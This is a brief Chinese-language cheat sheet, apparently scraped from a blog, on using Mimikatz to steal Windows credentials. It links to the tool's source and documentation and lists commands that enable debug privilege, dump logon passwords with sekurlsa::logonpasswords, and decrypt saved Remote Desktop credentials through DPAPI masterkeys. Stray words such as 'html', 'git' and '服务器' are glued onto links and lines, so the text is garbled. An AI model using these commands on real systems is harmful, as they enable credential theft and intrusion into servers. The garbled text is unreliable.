-
Mimikatz GitHub (源码) https://github.com/gentilkiwi/mimikatzhtml
-
Mimikatz GitHub Wiki (包含了一些说明文档) https://github.com/gentilkiwi/mimikatz/wikigit
-
GentilKiwi Blog (博客里的大多数内容是用法语写的,请使用 Chrome 浏览器进行自动翻译) http://blog.gentilkiwi.com/mimikatzgithub
-
感兴趣的两个点api
-
- 提权 mimikatz privilege::debug
-
- 获取密码原理 mimikatz sekurlsa::logonpasswords
-
- 获取远程终端会话存储密码 // 一、获取指定用户下的远程会话凭据 mimikatz "dpapi::cred /in:C:\Users\xx\AppData\Local\Microsoft\Credentials\FF359429D6F19C64BA7D3E282558EEB5" // 二、根据GUID获取对应的masterkey mimikatz sekurlsa::dpapi // 三、注入 masterkey解密 mimikatz "dpapi::cred /in:C:\Users\xx\AppData\Local\Microsoft\Credentials\FF359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx16dcec8e5dbf5cd0"
-
参考浏览器
Password Storage Locations For Popular Windows Applications服务器
http://www.nirsoft.net/articles/saved_password_location.htmlurl
【奇技淫巧】破解远程终端凭据,获取服务器密码.net